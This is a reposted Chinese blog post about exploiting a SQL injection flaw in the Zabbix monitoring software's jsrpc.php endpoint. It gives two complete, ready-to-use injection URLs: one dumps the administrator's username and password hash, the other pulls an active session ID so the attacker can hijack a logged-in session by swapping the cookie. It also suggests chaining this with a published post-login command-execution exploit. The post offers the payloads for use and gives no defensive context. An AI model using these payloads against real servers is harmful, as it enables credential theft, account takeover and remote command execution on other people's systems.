码迷,mamicode.com
首页 > 数据库 > 详细

Zabbix最新SQL注射漏洞利用

时间:2016-09-03 21:07:09      阅读:218      评论:0      收藏:0      [点我收藏+]

标签:

freebuf刚爆Zabbix的sql注入:http://www.freebuf.com/vuls/112197.html

漏洞测试:

爆用户名和密码:

http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(alias,0x7e,passwd,0x7e) from users limit 1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

技术分享

爆sessionid(可替换刷新登陆--替换cookie中的session id)

http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(sessionid,0x7e,userid,0x7e,status) from sessions where status=0 and userid=1 LIMIT 0,1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

技术分享

 

配合这个登录后的命令执行使用https://www.exploit-db.com/exploits/39937/

Zabbix最新SQL注射漏洞利用

标签:

原文地址:http://www.cnblogs.com/sn00py/p/5837868.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!